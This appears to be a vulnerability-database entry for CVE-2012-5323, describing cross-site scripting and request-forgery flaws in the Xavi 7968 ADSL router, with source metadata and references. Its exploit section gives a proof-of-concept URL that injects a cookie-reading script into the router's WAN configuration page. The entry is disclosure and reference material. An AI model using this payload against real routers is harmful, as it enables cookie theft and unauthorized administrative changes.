ID

VAR-E-201202-0072


CVE

cve_id:CVE-2012-5323

Trust: 1.9

cve_id:CVE-2012-5322

Trust: 0.3

sources: BID: 52098 // EXPLOIT-DB: 36864 // EDBNET: 58156

EDB ID

36864


TITLE

Xavi 7968 ADSL Router - Multiple Cross-Site Request Forgery Vulnerabilities - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36864

DESCRIPTION

Xavi 7968 ADSL Router - Multiple Cross-Site Request Forgery Vulnerabilities. CVE-79822CVE-2012-5323 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 36864

AFFECTED PRODUCTS

vendor:xavimodel:adsl routerscope:eqversion:7968

Trust: 1.0

vendor:xavimodel:adsl routerscope:eqversion:79680

Trust: 0.3

sources: BID: 52098 // EXPLOIT-DB: 36864

EXPLOIT

source: https://www.securityfocus.com/bid/52098/info

Xavi 7968 ADSL Router is prone to cross-site scripting, HTML-injection and cross-site request forgery vulnerabilities.

The attacker can exploit the issues to execute arbitrary script code in the context of the vulnerable site, potentially allowing the attacker to steal cookie-based authentication credentials, or perform certain administrative functions on victim's behalf. Other attacks are also possible.

http://www.example.com/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+

Trust: 1.0

sources: EXPLOIT-DB: 36864

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 36864

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36864

TYPE

Multiple Cross-Site Request Forgery Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 36864

CREDITS

Busindre

Trust: 0.6

sources: EXPLOIT-DB: 36864

EXTERNAL IDS

db:NVDid:CVE-2012-5323

Trust: 1.9

db:BIDid:52098

Trust: 1.9

db:EXPLOIT-DBid:36864

Trust: 1.6

db:EDBNETid:58156

Trust: 0.6

db:NVDid:CVE-2012-5322

Trust: 0.3

sources: BID: 52098 // EXPLOIT-DB: 36864 // EDBNET: 58156

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2012-5323

Trust: 1.6

url:https://www.securityfocus.com/bid/52098/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/36864/

Trust: 0.6

url:http://www.xavi.com.tw/

Trust: 0.3

sources: BID: 52098 // EXPLOIT-DB: 36864 // EDBNET: 58156

SOURCES

db:BIDid:52098
db:EXPLOIT-DBid:36864
db:EDBNETid:58156

LAST UPDATE DATE

2022-07-27T09:25:00.915000+00:00


SOURCES UPDATE DATE

db:BIDid:52098date:2012-10-10T18:20:00

SOURCES RELEASE DATE

db:BIDid:52098date:2012-02-21T00:00:00
db:EXPLOIT-DBid:36864date:2012-02-21T00:00:00
db:EDBNETid:58156date:2012-02-21T00:00:00